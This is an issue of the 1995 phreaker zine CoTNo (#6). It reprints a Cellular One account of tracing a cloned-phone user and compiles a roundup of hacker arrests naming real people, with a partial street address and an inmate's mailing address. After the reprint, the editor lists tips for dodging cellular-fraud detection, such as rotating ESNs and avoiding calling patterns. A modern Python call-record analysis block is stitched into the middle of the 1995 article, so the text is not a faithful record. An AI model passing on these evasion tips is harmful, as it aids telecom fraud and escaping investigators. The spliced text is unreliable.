Communications of The New Order
Issue #6
Fall 1995

"There is nothing more difficult to take in and, more perilous to conduct, or more uncertain in its success, than to take the lead in a new order of things."
- Niccolo Machiavelli

Cavalier........"I hacked codes to get warez for free drugs."
Dead Kat........"I have non-hacker friends but fuck if I keep in contact with them, they don't have k0d3z."
Disorder........"US West knew we were getting their stuff, they just didn't know we were on the deferred payment plan."
Edison.........."I said fuck you cop.. well I wish I had said that."
Major..........."SUNOS... the swiss cheese of unix."
Voyager........."I don't think money is as powerful as fear, but I have a day job."

Special Thanks: Gatsby, Mark Tabas, The Doktor, Presence, Demonika, Rage (303), Invalid Media, Deathstar, KevinTX, Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne, Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist, Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.

Good Luck: Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo, Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson, BernieS, Kevin Mitnick, Alphabits.

=========

__/\iNTRo/\__

CoTNo is a 'zine of the computer underground of the 1990's. It is written for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience. All the information published herein is as accurate as possible and pertains to techniques and devices that actually work. We do not publish any article that is not of an H/P nature.
If you wish to comment on or contribute to CoTNo, email one of us, or catch one of us on the iRC or try to catch us in your local Telco dumpster. Ahem...

This issue is dedicated to all of our good friends who have recently been busted. In fact, the last three issues are dedicated to them, since there have been more people busted in the last twelve months than at any time since Sundevil. In issue four I espoused my opinion that there was a federal conspiracy at work with paid informants masquerading as our friends. Last issue I gave detailed information on one of our own busted members, John Falcon. In this issue there will be information you can use to help keep yourself out of jail.

In this issue, Disorder has compiled detailed information on the busts of the last twelve months. Each bust that we heard of is detailed with names and events. Hindsight is always clearer than foresight, so hopefully you can learn from these busts how to avoid a similar fate.

Also in this issue, I am releasing confidential information on how cellular fraud is prevented. The information is straight from a national cellular carrier and details exactly how the telcos detect, trace, and bust cellular abuse. This information should convince you to take the utmost precautions if you are experimenting with cellular technology.

Lastly, John Falcon sent me an article on what to do if you do get busted. I think this is the first H/P article ever written from jail!

The following information was an actual article from Cellular One that was distributed to some of their employees. This article was not edited in any way, and contains the best information I have ever seen on how cellular fraud is prevented. If you are participating in cellular phreaking, I recommend that you read this article very closely and take it as a warning from the Cellular Telephone industry. They are getting serious about halting cellular fraud, and for good reason.
In New York for instance, often there are more fraudulent cellular calls than legitimate ones on any given day! The Fedz are on their side too. As you may already know, the Fedz ran an underground BBS for 8 months this year just to catch Cellular Fraudsters. In fact, Kevin Mitnick was recently busted using the same methods described in the following article.

The article, dated February 1995, follows:

A team of five Cellular One employees helped stop cellular fraud in Denver last week. To protect both our employees and future investigations, Cellular One team members' names will not be released.

California officials tracked a suspect from the Los Angeles area using a cloned cellular phone to Denver early last week and asked Cellular One for assistance in locating this suspect. With the cloned cellular phone number and a number the suspect repeatedly called in California, the five Cellular One employees and both local and California law enforcement agents began tracking the whereabouts of the suspect through the pattern of his cellular phone calls. Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an RSAT Plus, and hours of labor, the Cellular One team identified the suspect's calling patterns.

An AMA search is a record of an individual cellular phone number's calls. The cellular number is input along with the parameters for the search - start and finish date and time - and a log is printed which shows each individual call made by that cellular number. This tool is used generally within three days of the calls which you wish to observe. AMA searches were compiled over several days to document the calling patterns of the suspect. While the AMA searches show the past calling pattern, when attempting to capture a cellular fraud suspect, real time tools must also be used.
The Cellular One team used RFCALL Trace which tracks similar information as an AMA record with the exception that the information can be collected with only a 10 second delay from real time. RFCALL Trace also tracks the individual radio in use, any handoffs, and the signal strength of the cellular call. Law enforcement agents issued a subpoena to Cellular One for all information regarding the fraudulent cellular phone number's activity on our system.

Most of the fraudulent phone calls were being placed between 10am and midnight. Tracking which cell sites, cell faces, and radios the suspect's calls set up on identified a small geographical area as the suspect's base of action. Once an area had been established, one team member drove this area using an RSAT Plus, an IFR 1500, and a directional antenna (all basic cellular test equipment used in system optimization) to pinpoint the suspect's location to a specific apartment complex. This team member tracked the calls made by the suspect's cellular number and, watching the faces serving the calls and the handoffs made by the system during the suspect's calls, he was able to narrow down the location from which the calls were made to a specific side of one apartment building.

The law enforcement agents, equipped with their own brand of cellular fraud-busting tools, asked if the Cellular One team could identify the actual apartment within the building where the calls were being placed. A narrowband directional antenna was set to the transmit frequency of the cloned phone. One problem was that with each new phone call, the frequency being tracked changed. The suspect made short calls, most around one minute, with the longest between three to five minutes. Using the directional antenna and resetting the frequency with each new call on the cloned phone, the Cellular One employee identified a group of apartments within the building from which the cellular calls were being placed.
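The AMA search and the cell-site/face pattern work the article describes, as an added example (this is not Cellular One's tooling and not code from this zine): the log format, the MIN, the cell and radio numbers and every call record are constructed, and the "base of action" share is an assumed heuristic.

```python
# Added example, not from the Cellular One article or CoTNo: a toy AMA search
# (one number, start and finish date/time) and the calling-pattern summary an
# investigator reads off the result. All record formats and values are
# constructed for the example.
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass
from datetime import datetime
from statistics import median

TS = "%Y-%m-%d %H:%M"


@dataclass(frozen=True)
class CallRecord:
    mobile: str        # cellular number (MIN) that set the call up
    start: datetime
    duration_s: int
    called: str        # dialed number
    cell: int          # cell site that served the call setup
    face: int          # sector ("face") of that site
    radio: int         # radio the call landed on


def parse_ama_line(line: str) -> CallRecord:
    """Parse one constructed log line: MIN|start|secs|called|cell|face|radio."""
    mobile, start, secs, called, cell, face, radio = line.split("|")
    return CallRecord(mobile, datetime.strptime(start, TS), int(secs),
                      called, int(cell), int(face), int(radio))


# Constructed sample log: one cloned MIN over three days (assumed format).
AMA_LOG = """\
3035550199|1995-02-06 10:14|55|2135550142|17|2|4
3035550199|1995-02-06 13:40|70|2135550142|17|2|9
3035550199|1995-02-06 19:02|190|3035550177|17|2|4
3035550199|1995-02-06 23:55|48|2135550142|17|3|2
3035550199|1995-02-07 10:30|61|2135550142|17|2|11
3035550199|1995-02-07 16:05|300|2135550142|41|1|6
3035550199|1995-02-07 21:15|52|3035550177|17|2|4
3035550199|1995-02-08 02:10|40|2135550142|17|2|4
"""


def load_ama(text: str) -> list[CallRecord]:
    return [parse_ama_line(ln) for ln in text.splitlines() if ln.strip()]


def ama_search(records, mobile: str, start: str, finish: str) -> list[CallRecord]:
    """The AMA search as the article describes it: every call made by one
    cellular number between a start and a finish date/time (bounds inclusive)."""
    lo, hi = datetime.strptime(start, TS), datetime.strptime(finish, TS)
    hits = [r for r in records if r.mobile == mobile and lo <= r.start <= hi]
    return sorted(hits, key=lambda r: r.start)


def calling_pattern(calls) -> dict:
    """Summarise the log the way the investigation used it: the number called
    repeatedly, the hour the phone is busiest, how long calls run, and which
    cell site/face serves most setups (a stationary caller concentrates there)."""
    if not calls:
        return {"calls": 0}
    called = Counter(r.called for r in calls)
    hours = Counter(r.start.hour for r in calls)
    sectors = Counter((r.cell, r.face) for r in calls)
    top_called, top_called_n = called.most_common(1)[0]
    base_sector, base_n = sectors.most_common(1)[0]
    return {
        "calls": len(calls),
        "top_called": top_called,
        "top_called_count": top_called_n,
        "busiest_hour": hours.most_common(1)[0][0],
        "median_duration_s": median(r.duration_s for r in calls),
        "base_sector": base_sector,                      # (cell, face)
        "base_share": round(base_n / len(calls), 2),      # fraction set up there
        # radios seen on the base sector: what a real-time trace would watch
        "radios_seen": sorted({r.radio for r in calls
                               if (r.cell, r.face) == base_sector}),
    }


if __name__ == "__main__":
    recs = load_ama(AMA_LOG)
    hits = ama_search(recs, "3035550199", "1995-02-06 00:00", "1995-02-07 23:59")
    for r in hits:
        print(r.start.strftime(TS), r.called, f"cell {r.cell} face {r.face} radio {r.radio}")
    print(calling_pattern(hits))
```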
Unfortunately, the suspect slipped out of the building before the specific apartment was identified. Again using RFCALL Trace, the Cellular One team logged the suspect's next phone call on a cell site near Stapleton Airport. Law enforcement was notified and kept aware of the phone calls as the suspect traveled throughout the system. It became evident that the suspect was moving back toward the apartment complex. Surveillance officers outside the apartment noticed three men enter just moments before the Cellular One team notified them that a call had been placed from the apartment. Within 20 minutes, the suspects again left the apartment. Denver Police began pursuit of the suspect and made the arrest. Five additional cellular phones were found in the suspect's apartment. It has not been determined if these phones are cloned.

Although cellular fraud exists, it is possible to catch the criminals. Congratulations to our fraud busters! Cellular One asks that you keep this story confidential since the specifics of this and future investigations depend on our ability to catch the criminals in action.

End of Cellular One Article.

Pretty scary, huh? Cellular phreaking used to be considered pretty safe, but times have changed. The cellular phone companies are losing so much money on cellular fraud, that they have made busting the cellular hackers a priority. If you do commit cellular fraud, I suggest you use the following guidelines:

1. Never use the fraudulent ESN for over two weeks.
2. Change ESN's as often as possible.
3. Avoid creating a calling pattern with your fraudulent ESN.
4. Avoid using the fraudulent ESN from a stationary location.

These tips could keep you out of jail! Because you cannot divert with a cellular phone (unless you are Kevin Mitnick) these precautions are necessary. As my friend John Falcon told me, "It's not worth doing time for silly phone shit." He's right. H/P is fun, but anyone who has gotten busted will tell you the same.
But if despite these warnings, you still decide to cellular phreak, just make this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."

|>ead|

=========

-= Operation Phundevil =-
by DisordeR[TNo]

With all the busts happening in the past year, and a lack of information in the scene regarding who got busted when, and for what, I decided to put this article together. After working on this for a while, I realized that not only was it a little difficult in finding bust info, but half of the little you found was bullshit. The information in the following article is as accurate as I can find. With all the different accounts of what happened, different nicknames, different NPA's, and pure stupidity out there, don't bet your life on the information contained within this article. The following sections give you some details about some busts, and RUMORS of others. I indicate which are rumors and which are legit. I utilized everything from BBS posts, to newspaper articles, to word of mouth. Thanks to those who helped me on this. And by no means is this NEAR complete...

=-=

"OPERATION CYBERSNARE: FEDZ = 1, PHREAKZ = 0"

Main Thugs:
Peter A. Cavicchia II - Special Agent in Charge
Donna Krappa - Assistant U.S. Attorney in Newark
Stacey Bauerschmidt - "Carder One"

The Busted:
Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break into the Portland, Oregon AT&T Wireless computers.
Kevin Watkins - "Led" - Houston, Texas: Accused of conspiring to break into the Portland, Oregon AT&T Wireless computers. Watkins used the computer system of Embry Riddle University in Prescott, Ariz., to enter the McCaw computer, Secret Service Special Agent Stacey Bauerschmidt said in a sworn statement.
Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused of trafficking in cloned cellular phones/equipment and stolen access devices (ESN/MIN Pairs).
Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in stolen access devices.
Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in unauthorized access devices.
Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing and trafficking in hardware used to obtain unauthorized access to telecommunications services.

Penalty: If convicted, defendants face maximum possible sentences ranging from 15 years for Cushing to 10 years for Bradford, Clarkson and Natoli and five years for Lacap and Watkins.

Details: Starting in January, Stacey Bauerschmidt and other Secret Service agents in Newark, NJ, set up what is now called "an electronic chop shop" by the press. Stacey (in cooperation with a 'nameless informer' who will be mentioned later) set up a computer BBS called "Celco 51" with the intent of busting hackers and phreakers specializing in cellular phone fraud. For the first six months, the board operated using MBBS with four nodes. At any given time the board had an 800 re-route (not really) so that the users could call without any problem (ANI). To the credit of the agents in charge, the board did not allow just anyone access. The sysop (PMF) appeared to discriminate and only allow the 'elite' members of the H/P community on. With the illusion of security, the agents running the board could successfully monitor the users, and begin to make deals with the hackers.

Stacey [Who went by 'Carder One'] continually asked members of the BBS if they were interested in selling ESN/MIN pairs [Used for cellular phone fraud]. These 'pairs' are considered 'illegal access devices' and are usually found in large enough amounts to consist of felonies. On top of the illegal access devices, Stacey was looking for people that were willing to sell illegal cloning equipment. This equipment consisted of devices used to get pairs, clone phones, and reprogram phones. The operation was very successful in many ways, notably the ability of the agents to mask the true nature of the board.
For over eight months, Stacey and other agents monitored the board looking for any chance to prosecute any of the members. The sysop (PMF) continuously advertised the board to the members, as well as mailed and HARASSED members into calling more than they wished to (Entrapment anyone?). PMF was responsible for mailing members up to three times a day, message flooding people on IRC, and using other methods of harassment to get hackers to call. On top of the harassment, Carder One continuously asked for people to post 'pairs' as well as sell them in private. In a few cases, individuals would not have considered selling these pairs had the federal agents not harassed them so much. Ahem.

"Cushing and five others were arrested in four states during a sweep last week by federal agents. Another 14 raids spread over eight states led to the confiscation of 31 computers, 65 illegally programmed phones and 14 "readers," devices used to illegally pluck cellular phone numbers and serial codes from cellular phone transmissions."
[Wonder whose computer will run the next sting board?]

"But because the alleged crooks posted phone numbers on the bulletin board indicating where they could be reached, the Secret Service was able to trace the calls, leading to the arrests."
[Need we emphasize the importance of Diverting any more?]

"But officials said this case represented the first time that the Secret Service had created an entirely new computer bulletin board..."
[Couldn't bust any warez kiddies recently...]

[Watch out kiddies... They are using more than 'questionable' methods of busting hackers and phreaks these days. If you haven't met someone, be careful of what you post on their systems.. many people thought PMF was cool until he NARKED on everyone that he could.]

=-=

"ANARCHIST BUSTED FOR WRITING MAGAZINE"
From: The Anarchives

In early March of 1995 I was arrested for "Unauthorized Use Of A Computer".
Three large, white, plain-clothes detectives from 52 division in downtown Toronto came to my house, promptly arrested me, took me to a holding cell, and conducted a strip search (looking for codes I guess). I was held in custody for four hours (7:30 pm to 11:30 pm), and released as a result of substantial protest made by friends and family at the sergeant's desk. I was being accused of breaking into the computer systems at the University Of Toronto for the purpose of publishing "Anarchist newsletters". The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie, saw someone on his system publishing Anarchist materials, assumed I was a malicious "hacker", turned over all records of my email, news posts, key strokes, you name it, to the police at 52 division. The police, realizing how dangerous these "hacker anarchist" types are, had to come to my house to cuff me, bring me down, and strip search me. I was to face trial for a possible six months in prison, just for exercising my democratic rights and responsibilities. Of course the end result was that the charges were dropped, although this was not until several months later (Sept 7, 95), after several appearances in court, and after my agreeing to pay $400 to the skule.

=-=

"FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
by, Denny Walsh
From: The Sacramento Bee
Saturday Sept. 16, 1995

Two talented Berkeley hackers were charged Friday with computer-age crimes against a Tower Video rental store in Sacramento, federal authorities said, in large part because they went up against Tower's even more talented electronic security corps. When authorities raided their apartment last month, Terry Patrick Ewing, 21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower customers, federal prosecutors said. According to a federal grand jury indictment, Ewing and Kim used their personal computer to break into a system known as TRON, owned and operated by Tower's West Sacramento-based parent, MTS Inc.
Kim and Ewing are charged in a three-count indictment with conspiracy, fraud and the unauthorized destruction of computer data. The prosecutor said the pair are not in custody and will be allowed to surrender next week. He said he does not see them as flight risks.

=-=

"KEVIN MITNICK BUST - HIGHLIGHTS"
From Multiple Sources

If you want more details, read the hundreds of articles about this story. Also, read the Phrack 47 editorial pertaining to this subject.

Kevin Mitnick (31)
-One of the first indicted under Computer Security Act of 1987
-Search began in November 1992
-Mark Seiden (expert in firewalls) discovered that someone had obtained all of Netcom's credit card numbers for 20,000 online subscribers.
-Stole files from: Motorola, Apple, Netcom, and more.
-Mitnick used the Well as a repository for files he stole from computer security expert Tsutomu Shimomura.
-After raping Tsutomu, he used Bruce Koball's account to transfer proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm, and other cell manufacturers.
-Shimomura concluded that it was Mitnick, and that he was operating through cellular, from Raleigh, NC
-Mitnick was bouncing his calls through GTE Switches, local switches, and a few types of cellular switches, and utilized Netcom's dialins.
-Lived in Player's Court, a 12-unit apartment building in suburb of Duraleigh Hills, three miles from the airport. He lived in Apt 202.
-Until a week or two before he was arrested, FBI surveillance agents in Los Angeles were certain that 'the intruder' was somewhere in Colorado.
-FBI arrested him at 24 hour stakeout
-Arrested in Raleigh, N.C. at 1:30 a.m.

=-=

"PHREAKS BUSTED IN NY... MORE TO COME"

"Ok all Listen up and listen good. resistance is down. Maybe permanently. Most of you prolly haven't heard yet, but there have been major busts going around. ... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire have been busted. ...
that they even busted Craig Neidorf (Knight Lightning) again. More bad news. If you are on UPT (unphamiliar territory) or Cellco 51, stop calling. The SS who raided hellfire slipped a bit and bragged about being on those boards. Hellfire said the feds were mostly interested in credit cards, VMB's, and Cell phones. They are looking to bust for cellular, VMB's and credit cards... Tokien entry i found out has been in jail for 2 days! Neon Samurai was busted for credit cards and also for telco equipment that the nynex people said was worth 50,000."

PMF's (Narc) reply:

"dude, this is utter shit and i expect u to post this reply for me seeing as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs among others, he was the only person busted and nothing to do with his busts was EVER mentioned on my board. He doesn't even get involved in cellphones, he was busted coz he and every other person busted used 1 800 CALL ATT from his house.. what a bunch of lamers... I don't even know who wrote that next but i would like to find out.. probably the guys from NYHE..."
[Ironic isn't it!]

=-=

"ALPHABITS ORIGINAL BUST LAST YEAR"

Caught alphabits on irc last night and he said:
but I got sent to prison 7 months ago, and lost contact
***
According to different people, he was busted for check fraud and/or credit fraud and/or cellular fraud. Unfortunately, I will not be able to talk to him until after this article.

=-=

"SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
From another group member:

Syncomm was talking on the phone.. the day before Master of Reality got busted... so MOR, Greg and equinox were sitting there chatting away when a load of federal agents and some local police busted down his door. He dropped the phone and all they heard was a rustle of papers .. then a "Secure that paper!" then a click.. They put a shotgun to his head and said "Hello Syncomm". They said he was the leader of S.O.B. an international terrorist organization.
Then again they thought that Crypt Keeper and MOR were also the sole leader of SOB ... So then they put a knee to his back and handcuffed him. They proceeded to interrogate.. and at one point this one agent tried to seduce him into talking .. He was finally led outside when his neighbor walked up to them and handed them all of Greg's notes, etc.. that Greg had asked him to stash.. Greg then threatened his neighbor's life.. and was led off to holding... where they produced "A big fucking printout" that apparently detailed Greg's activities.. they nailed him for hacking UC and then accused him of crashing their systems.. Along with criminal tools and some other offenses..

=-=

"FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz that has software companies upset to see piracy extending into the CD-ROM format.
From the Associated Press, Saturday Dec 24 1994

BUFFALO, New York - The FBI has arrested a Canadian father and son in what is believed to be the first major case of CD-ROM piracy in the United States. Agents said Thursday they seized 15,000 counterfeit copies of the popular CD Rom games REBEL ASSAULT and MYST that were being sold at 25% of retail value. PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of CHICAGO were arrested in Buffalo and charged with felony copyright infringement. The counterfeit goods were recovered in a Niagara Country warehouse authorities said. The FBI told the Los Angeles Times that additional warrants were served in INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling the illegal software. MORE ARRESTS ARE EXPECTED.

=-=

"MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"

TORONTO - Canadian, US and European investigators have cracked a ring of computer hackers who allegedly stole about $5 million US$ by breaking into the computers of phone companies and other firms.
The 12 hackers who met over the Internet used coding and call switching to conceal the transfer of funds, codes and communications. RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED GUILTY on Tuesday, June 27 1995. He got 90 days in Jail and 100 hours of community service for HELPING the RCMP with their investigation - instead of at least a one year jail sentence.

=-=

"RUMORS FROM 914"

There has been a huge chain of busts in 914. Apparently, GANGSTER, who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor goes on to say that he was 'fucking around with CC's' which led to the bust.

=-=

"WAREZ BUSTS IN 510"

The Sewer Line BBS in 510 met trouble on December 11th due to the distribution of console warez (from various posts). Rumor also has it, that a user on the board going by ROCK'N was in fact a Sega representative, and narked on the sysop for his activities.

=-=

"214 BUSTS"

During August of '94, several boards (mostly warez/ansi affiliated) were raided by the FBI. The busts occurred in the Dallas/Ft. Worth area, the list follows:

Agents of Fortune [409] (Sysop: Butcher [LEGEND])
Suburbia [214] (Sysop: The Chairman [RZR])
The Network [214] (Sysop: Masterblaster)
The Depths [214] (Sysop: Maelstrom ex-[RZR/iCE])
Elm Street [214] (Sysop: Freddy Krueger)
User to User [214] (Sysop: William Pendergast)

=-=

"PHILLY 2600 MEETING"

From recent posts and word of mouth, the Philadelphia 2600 meetings are having a hard time making it past 5 minutes. Apparently, local police in coordination with mall rent-a-cops [joining of forces there], are kicking hackers and phreakers out of their meeting place based on charges of loitering and conspiracy [to do what?! Assemble?]. Currently, police are threatening to break up meetings, and/or jail participants for the two reasons cited above.

=-=

"FEDZ BUST KID IN MINNESOTA"

November '94, a 15 year old in Minnesota had a pleasant visit by federal agents.
According to newspaper articles, the boy [unnamed in the article] was basing his hacks out of the Detroit Free-Net. "He used passwords to gain access to more than 10 computer networks from Detroit to Moscow". During his time on the Detroit Free-Net, he was said to have maliciously disabled enough of the system 'forcing' it to shut down. Currently, the boy is facing potential charges for using telecommunications devices to cross state lines, and felony charges for breaking into computer systems.

Other favorite quotes from the articles about this case:
"...hospitalized, possibly for psychological reasons, when police confiscated his computer modem and software programs Monday."
"...said the boy appeared to fit the typical hacker profile: a 15- to 20-year-old male, many who have low self-esteem. 'He really could use a girlfriend instead of a computer' Grewe said."

=-=

"THE TROUBLES OF BERNIE S."

Recently, a lot of press has been covering the story of 'Bernie S'. You can find more info about his bust on alt.2600 as well as several 'hacker' mailing lists. Here are some of the interesting quotes from one of those articles:

"Ed Cummings, also known to many in cyberspace as Bernie S, was arrested on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail."

His arrest took place at a local 7-11 where *15* police cars pulled into the parking lot. During the interaction with the officer, he told them 'no, you can't search my car', yet minutes later, he noticed an officer going through the contents of his car. Despite his protests, the officer removed several timing crystals, tone dialers, and a 'broken red box'. The following day, Bernie was at a friend's house when '8 to 10' plain clothed armed men burst into the house yelling 'freeze'. Minutes later he was being taken to jail in cuffs.
He was not formally charged until his arraignment where his bail was set to 100,000 dollars because he refused to talk with the police without counsel present.

"The Judge dropped the two unlawful use of a computer charges due to the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question. As of 3/27/1995 Ed Cummings is still in Delaware County Prison awaiting his trial."

=-=

"RUSSIANS ARREST 6 IN COMPUTER THEFTS"
This article was taken from the Associated Press, Saturday Dec 24 1994

St. Petersburg, Russia, Sept 26 (AP) -- Russian police officers have arrested six more people in a $10 million computer theft from Citibank here, but the masterminds are said to remain at large. Several people have been arrested abroad and face charges in the United States, including Vladimir Levin, 28, reportedly the group's computer hacker. Citibank officials said they recovered all but $400,000 and upgraded the cash-management system's electronic security after the theft.

FT, Sept 21, 1995.
Extradition in Citibank hacking case
A British court yesterday approved the extradition to the US of Mr Vladimir Levin, the Russian science graduate accused of an attempted $10m (6.5m pounds) computer hacking fraud on Citibank. ...

=-=

"PURPLE CONDOM CAUSES TROUBLE"

Purpcon recently had pleasant meetings with his Dean where he attends college after getting caught rewriting his magnetic student ID, so that others would get charged for his meal. :)

=-=

"CoTNo RUMORS"

In past issues of CoTNo we have always said 'good luck to' people that have been busted (or said to have been busted).. Deathstar, AntiChrist (school admins?), Coaxial Mayhem, Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking), Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
At the request of some of the above, I can't go into details on their busts.

=-=

"JOHN FALCON BUSTS"

Since rumors about his bust have been running rampant on the 'Net', here are the facts about the bust... for more info, and JF's reply to the rumors, read CoTNo 5.

Common myths of my arrest:
1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
2 - Mr. Falcon left his secring.pgp on his system.
3 - FBI/NSA read the RSA encrypted data.
4 - My conviction was because I was a hacker.

Let me go over my conviction:
Count 1: Theft of Government Property - How they caught me: Narc
Count 2: Fraudulent use of an Access Device - How they caught me: Narc
Count 3: Fraudulent use of a Computer - How they caught me: questionable
Count 4: Fraudulent use of an Access Device - How they caught me: Narc

If you would like to get in contact with JF, here is his info:
email: jfalcon@ice_bbs.alaska.net
snailmail: Don Fanning #12617-006
3600 Guard Road
Lompoc, CA 93436

=-=

"EPSILON, DAMIEN, SHOCKWAVE (303)"
From CoTNo 3 (Read there for full story)

Three Colorado teen-agers are suspected of setting up an elaborate computer-hacking system that tapped into a long-distance telephone company and stole secret access codes (k0dez!). Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson County in the alleged scheme.

=-=

"INTERVIEW WITH A CRYPTKEEPER"

ck: I only got busted last February (1994) for hacking
dis: I heard you got hit twice.. once last year, and once a lot more recently..
CK: nope, I moved, I didn't get busted. I only got busted last year, once, that's it. And it wasn't real serious.. not like cellphone/money laundering..just some inet hacking. I got busted for hacking the University of Cincinnati and a few other things on the net.. they traced me through a PBX.. they were serious. They thought I was a spy. they were pissed to find out I was just a 16 year old.
dis: hmm... bad.. did they just search/seize or what?
ck: search/seized my computer.. I eventually got most of my stuff back (the computer, monitor, and keyboard) and had to spend 10 days in juvenile thats about it. oh.. and a big pain in the ass too of course not bad at all..
dis: anything else?
ck: and tell them I was only busted ONCE, and it wasn't all that serious. I don't have any plans to get back into the scene (it sux now), but I do enjoy hearing about it sometimes.

=-=

"FEDZ CATCHING ON TO CALLING CARD SKAMS"

A $50 million telephone calling-card theft ring disclosed earlier this week by federal investigators is representative of the advanced types of scams that have emerged in the last two years as telephone companies have become better at ferreting out fraud. The Secret Service said Ivy James Lay, a switch engineer at MCI's network center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI and other long distance companies, later selling them to a 'band of computer hackers.' The estimated value of the cards lies near $50 million. The Secret Service (which investigates fraud like this) claims this to be the largest case of calling card theft to date.

=-=-=

"SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"

Two computer hackers have been sentenced to fed. prison and an accomplice in Mn. awaits sentencing for his part in an international phone conspiracy. Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C., were part of a hacker ring that stole credit-card numbers from MCI's Computer terminal in Greensboro. A third member of the ring, Leroy James Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal copyright violations. US District Court Judge James Beaty on Fri. sentenced Lay to three years and two months in prison. Stanton, a 22-year-old student at Wingate College, was sentenced to one year. Anderson's sentencing is expected this summer.
The conspiracy stretched into several European countries and cost long- distance carriers more than $28 millon, authorities said. Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking in unauthorized access devices. The group bought and sold at least 50,000 numbers from 1992 until the summer of 1994, according to court documents. "What I did was very stupid," Stanton told Judge Beaty at his sentencing. "I'd like to go back and finish college." =-=-= "SHOCKER[303] GETS NAILED FOR CC'S" Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda listened to you. Fuck me. Got my mac taken away, I am writing this from a friends, I am not supposed to be here either, but hell, I got everything taken away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what happens, I'll call you sometime if I can get to the phone w/out my parents knowing. I can't have anything back until I pay for this shit, I think it is between $400 and $500, not sure, I already paid $170, but then I hafta fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I got like, a felony and a second degree misdemeanor for that shit, they will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony) and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll see ya ok? Bye.. =-=-= "NYHE RUMORS" The New York Hack Exchange got busted for scams and cellfonez... (Someone mail me with more than a rumor please) =-=-= "WAREZ BOARD BUSTS AROUND THE COUNTRY" Bad Sector [BUSTED!] Beyond Corruption [BUSTED!] Jurrasic Park [BUSTED!] Lineup [BUSTED!] Main Frame [BUSTED!] Necronomicon [BUSTED!] No BBS [BUSTED!] The Notice [BUSTED!] On The World [BUSTED!] Perfect Crime [BUSTED!] Red Alert [BUSTED!] Restricted Area [BUSTED!] Rubbish Heap [BUSTED!] Skull Island [BUSTED!] Twins [BUSTED!] The Underworld [BUSTED!] Wolf Pack [BUSTED!] 
15 Arrests 75 RCMP Officers Involved Removed at least 11 BBSs in one day Seized more than $200,000 in computer hardware Operation/Investigation lasted 6 months to 1 year April 12, 1995 Busts are localized in Montreal 514 NPA =-=-= "DUTCH HACKER ARRESTED" (from CUD 7.21): --------------Original message---------------- UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has become the first person to be convicted of computer hacking in the Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science student, was handed down a six month suspended sentence by magistrates last week, and was fined around $3,200 Oosteveen was accused of breaking into university, corporate and government computers, following his arrested in March, 1993, just three weeks after new Dutch anti-hacking legislation came into force. Oosteveen was caught in the act of trying to hack into the computer lines of a technical university in Delft near The Hague. He is also thought to have been responsible for previous hacking attacks which occurred before the new legislation came into force. =-=-= "THE EAST COAST" Tabas and Others Bust: According to Gatsby, the following were busted: Himself, Mark Tabas KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker. (When I talked to him, he wasn't able to say much since it was the day after the bust) From empire Times: February 22, 1995 One thing all the people have in common: Southwestern Bell - or at the very least, the desire and ability to hack all the switches on the west coast. According to those involved, it goes way beyond switches... =-=-= "THE LAMACCHIA CASE" April 94: BOSTON, MA ...A federal grand jury returned a felony indictment today charging an MIT student in a computer fraud scheme resulting in the piracy of an estimated million dollars in business and entertainment computer software. United States Attorney Donald K. 
